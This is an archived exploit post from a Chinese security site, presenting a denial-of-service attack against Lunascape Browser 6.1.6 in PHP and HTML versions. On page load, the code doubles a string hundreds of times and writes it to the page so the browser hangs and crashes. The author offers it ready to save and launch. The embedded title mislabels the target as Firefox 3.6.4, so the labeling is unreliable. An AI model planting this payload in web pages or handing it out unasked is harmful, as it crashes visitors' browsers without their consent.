首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Lunascape Browser 6.1.6 Denial of Service Exploit
来源:the_gl4di4t0r[AT]hotmail[DOT]com 作者:GlaDiaT0R 发布时间:2010-06-30  
##############################################################################
# [+]Title: [Lunascape Browser 6.1.6 Denial of Service Exploit]
##############################################################################
# [+] About :
##############################################################################
# Author :  GlaDiaT0R  
# Contact: the_gl4di4t0r[AT]hotmail[DOT]com or berrahal.ryadh[AT]gmail[DOT]com
# Team :  Tunisian Power Team  ( DarkGh0st.Net )
# Greetz : ALLAH ! , Boomrang_victim, Marwen_Neo, Alphanix, Zigma & my friends
##############################################################################
  
 [+] : Save it at exploit.php or exploit.html and by launching this code  the browser will not respond and it will crash .


 [+] : Exploit
 
  =====================
         PHP
  =====================
exploit.php

  <?php
echo "<html><title>Mozilla Firefox 3.6.4 Denial of Service Exploit </title>\n"; 
echo "<script>\n"; 
echo "function junk()\n"; 
echo "{\n"; 
echo "var buff=\"A\";\n"; 
echo "for (i=0;i<787;i++)\n"; 
echo "{\n"; 
echo "buff+=buff+\"A\";\n"; 
echo "document.write(buff+buff);\n"; 
echo "}\n"; 
echo "}\n"; 
echo "</script>\n"; 
echo "<body onload=\"javascript:junk();\">\n"; 
echo "<font color=white>the_gl4di4t0r<font color=\"grey\">[AT]</font>hotmail<font color=\"grey\">[DOT]</font>com</font>\n"; 
echo "</body>\n"; 
echo "</html>  \n"; 
echo "\n";
?>

  =====================
         HTML
  =====================
exploit.html
 
 <html><title>Mozilla Firefox 3.6.4 Denial of Service Exploit </title>
<script>
function junk()
{
var buff="A";
for (i=0;i<787;i++)
{
buff+=buff+"A";
document.write(buff+buff);
}
}
</script>
<body onload="javascript:junk();">
<font color=white>the_gl4di4t0r<font color="grey">[AT]</font>hotmail<font color="grey">[DOT]</font>com</font>
</body>
</html>  

##############################################################
Notice: I'M MUSLIM
##############################################################




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GSM SIM Utility sms file Local
·FineBrowser v.3.2 Denial of Se
·PHP-Nuke <= 8.0 Remote SQL Inj
·Internet Browser Classic (IBC
·ShopCartDx <= v4.30 (products.
·Netscape Browser 9.x Denial of
·Linux/ARM - Disable ASLR Secur
·Opera 10.54 Denial of Service
·Oxygen2PHP <= 1.1.3 (member.ph
·Acoo Browser 1.98.744 Denial o
·Linux/ARM - polymorphic chmod(
·TheWorld Browser 3.1.6.8 DOS E
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved